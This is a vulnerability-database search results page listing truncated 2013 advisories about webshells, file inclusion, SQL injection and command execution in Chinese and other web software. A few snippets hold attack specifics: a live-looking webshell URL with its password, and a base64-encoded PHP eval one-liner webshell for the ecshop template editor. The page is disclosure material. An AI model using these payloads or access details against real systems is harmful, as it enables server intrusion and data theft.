
2126 matches found

securityvulns
added 2013/07/15 12:0 a.m., 42 views

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities
Date: 2013-05-04
References: http://www.vulnerability-lab.com/getcontent.php?id=939
VL-ID: 939
Common Vulnerability Scoring System: 5.9
Introduction: You ha...

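Exploits: 0
seebug.org
added 2013/07/08 12:0 a.m., 57 views

Yonyou software development management platform: IIS write permission allows obtaining a webshell on the server

Brief description: see details. Detailed description: http://ufsdp-borrow.ufsoft.com.cn/cmd.asp http://ufsdp-borrow.ufsoft.com.cn/1937cN.txt Proof of vulnerability:...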

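7.1 AI score
Exploits: 0
seebug.org
added 2013/07/08 12:0 a.m., 17 views

Yonyou Chanjet Service Alliance 4S store had a webshell uploaded (the shell has a weak password)

Brief description: see details. Detailed description: The official website of the Yonyou Chanjet Service Alliance 4S store (Qitong service). During testing an aspx webshell was detected, and the weak password gets straight in: http://www.uftong.com/Admin/ManagerTestimony/ftb.image.aspx password admin --! Proof of vulnerability:...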

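7.1 AI score
Exploits: 0
seebug.org
added 2013/07/08 12:0 a.m., 17 views

Yonyou R&D practice sharing platform: directory traversal vulnerability reveals an existing webshell (IIS parsing vulnerability)

Brief description: see details. Detailed description: http://ufsdp-zjsj.ufida.com.cn/index.aspx Directory traversal address: http://ufsdp-zjsj.ufida.com.cn/files/ On this page I found traces left by a predecessor; following the trail, I found one of the trojans the predecessor had uploaded via Fck that was not fully parsed, and obtained the one-liner password as Using the path the predecessor had paved, connect directly with Chopper: http://ufsdp-zjsj.ufida.com.cn/files/s.asp;.jpg Proof of vulnerability:...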

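7.1 AI score
Exploits: 0
seebug.org
added 2013/07/01 12:0 a.m., 22 views

Yonyou software: IIS write permission (PUT) allows obtaining a webshell and controlling the server

Brief description: One year later, Yonyou blows up again. I'm just a newbie who only knows PUT, so the god-tier bosses among the wooyun losers please don't flame me, just move along! I heard you can redeem QB now, and I'm mainly here for the QB. That's all a broke loser aspires to. Detailed description: http://summit.ufida.com/ I tested it once in August 2012 and it was present; now it's back, heh. PUT, you all know! WooYun: Yonyou sub-site vulnerability exploitation and intrusion. Why does the vulnerability still exist? Proof of vulnerability:...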

7.1 AI score
Exploits: 0
myhack58
added 2013/06/14 12:0 a.m., 33 views

One dedecms variable coverage holes of the wretched use of the method-vulnerability warning-the black bar safety net

The most recent dedecms variable coverage holes, and finally can control the global variables, but can not completely control $GLOBALS$v1 .= $v2; Note that there is a sliding scale, is in an initialized global variable content on a sliding scale the content. It has now been disclosed the exploit...

0.2 AI score
Exploits: 0
myhack58
added 2013/06/13 12:0 a.m., 17 views

PHP file include vulnerability attack and Defense combat-vulnerability warning-the black bar safety net

Summary: PHP is a very popular Web development language, and many Web applications on the Internet are developed in PHP. In Web applications developed in PHP, the PHP file include vulnerability is a common vulnerability. Using PHP file include vulnerabilities to intrude into a website is...

0.9 AI score
Exploits: 0
myhack58
added 2013/06/03 12:0 a.m., 36 views

php LFI to read the php file source code as well as directly post webshell-vulnerability warning-the black bar safety net

Recently in the busy defcon topic training where a set of topics where there is a foreigner to write it is mentioned in the LFI, another tips The original text please refer to the PS: the skill is not a new technology bull God has certainly been with got bored, so when passing on the line =,= I...

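7.5 AI score
Exploits: 0
seebug.org
added 2013/05/30 12:0 a.m., 25 views

The latest ecshop patch contains a webshell; site administrators, please take note!

Brief description: The latest ecshop patch (May 6, 2013) contains a backdoor; site administrators, please take note! Patch address: http://bbs.ecshop.com/viewthread.php?tid=1129622 If you have downloaded it, please deal with it promptly. I also hope the vendor will notify users by public announcement! Detailed description: The vendor has already stopped offering the patch for download. I downloaded the patch from a third party, ecmoban.com. At first I thought the third party had deliberately written the backdoor, so I contacted ecmoban staff. It was confirmed to be caused by the ec forum being compromised with malicious code. Shell location...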

7.1 AI score
Exploits: 0
seebug.org
added 2013/05/29 12:0 a.m., 16 views

Getting a webshell from the ecshop admin backend

Brief description: Getting a webshell from the ecshop admin backend. Detailed description: Template management -- language item editing. For example: user.php Search for: 状态 Insert $$fputsfopenbase64decodeZnVjay5waHA,w,base64decodePD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4 Visit http://localhost/ecshop/languages/zhcn/user.php One-liner: http://localhost/ecshop/languages/zhcn/fuck.php Proof of vulnerability:...

7.1 AI score
Exploits: 0
Kitploit
added 2013/05/23 8:55 p.m., 15 views

[jSQL Injection v0.4] Java tool for automatic database injection

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL is free, open source and cross-platform Windows, Linux, Mac OS X, Solaris. Version 0.4 features: GET, POST, header, cookie methods Normal, error based, blind, time based algorithms Automatic...

7.6 AI score
Exploits: 0
myhack58
added 2013/05/18 12:0 a.m., 16 views

Meng Jie home textile jboss configuration improper has been invaded many times-the vulnerability and early warning-the black bar safety net

Estimated you also have seen, just haven't submitted. Supposedly now is a positive card manufacturers, the author fixes it. Detailed description: Information leak: http://amb.mendale.com.cn/status?full=true From the figure we can see that in my screenshot, still someone in to access the...

Exploits: 0
myhack58
added 2013/05/13 12:0 a.m., 37 views

cmseasy{easy through CMS} v5.5 arbitrary file upload vulnerability in the simple analysis of reference using the method-vulnerability warning-the black bar safety net

Yesterday someone disclosed a cmseasy v5.5 arbitrary file upload vulnerability, and it came with an exploit. Exploiting the vulnerability allows directly uploading a webshell and other malicious files; the harm is huge, and the vendor currently has not released any patch. Here to do some simple...

7.3 AI score
Exploits: 0
exploitpack
added 2013/05/13 12:0 a.m., 14 views

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities

Wifi Photo Transfer 2.11.1 PRO - Multiple Vulnerabilities
Title: Wifi Photo Transfer 2.1 & 1.1 PRO - Multiple Vulnerabilities
Date: 2013-04-21
References: http://www.vulnerability-lab.com/getcontent.php?id=932
VL-ID: 932
Common Vulnerability Scoring System:...

0.4 AI score
Exploits: 0
Exploit DB
added 2013/05/13 12:0 a.m., 23 views

File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities

Title: File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities
Date: 2013-05-04
References: http://www.vulnerability-lab.com/getcontent.php?id=939
VL-ID: 939
Common Vulnerability Scoring System: 5.9
Introduction:...

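7.4 AI score
Exploits: 0
seebug.org
added 2013/05/11 12:0 a.m., 13 views

Kingdee website allows arbitrary command execution with root privileges

Brief description: The Kingdee website allows arbitrary command execution with root privileges. Detailed description: The user login page of the Kingdee website, http://id.kingdee.com/, has a command execution vulnerability. Via the struts2 private variable class.classLoader.jarPath, arbitrary commands can be executed (with root privileges), and a webshell could very likely be obtained (of course, I did not try to obtain one), which could in turn threaten the security of user data. Because arbitrary commands execute with root privileges, full control of the server can be obtained, and this server could be used as a stepping stone to threaten the security of other surrounding servers. Proof of vulnerability: Visit the following link with the IE browser:...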

7.1 AI score
Exploits: 0
exploitpack
added 2013/05/08 12:0 a.m., 36 views

MoinMoin - Arbitrary Command Execution

MoinMoin - Arbitrary Command Execution !/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██...

0.3 AI score
Exploits: 0
Exploit DB
added 2013/05/08 12:0 a.m., 72 views

MoinMoin - Arbitrary Command Execution

!/usr/bin/env python -- coding: utf-8 -- ascii = '\x1b1;31m' ascii +=' \r\n' ascii +=' ██████████ ██████ ███ ███ ███ ██████████ ████████ ███ ███████ \r\n' ascii +=' ███████████ ████████ ███ ████ ███ ███████████ ████████ ███ ███████ \r\n' ascii +=' ██▒ ██▒ ██▒ ██▒ ███ ██▒ ██▒█▒███ ██▒ ██▒ ██▒ ██▒...

7.4 AI score
Exploits: 0
Vulnerability Lab
added 2013/05/04 12:0 a.m., 15 views

File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities

Document Title: File Lite 3.3 & 3.5 PRO iOS - Multiple Web Vulnerabilities
References Source: http://www.vulnerability-lab.com/getcontent.php?id=939
Release Date: 2013-05-04
Vulnerability Laboratory ID VL-ID:...

0.4 AI score
Exploits: 0
Exploit DB
added 2013/04/25 12:0 a.m., 44 views

Hornbill Supportworks ITSM 1.0.0 - SQL Injection

Summary: SQL Injection Vulnerability in ITSM component of Hornbill Supportworks Application
CVE number: CVE-2013-2594
Impact: High
Vendor homepage: http://www.hornbill.com
Vendor notified: 19/11/2012
Vendor response: This issue has reportedly been fixed but the vendor refused to give version...

7.5 CVSS, 6.5 AI score, 0.02638 EPSS
Exploits: 6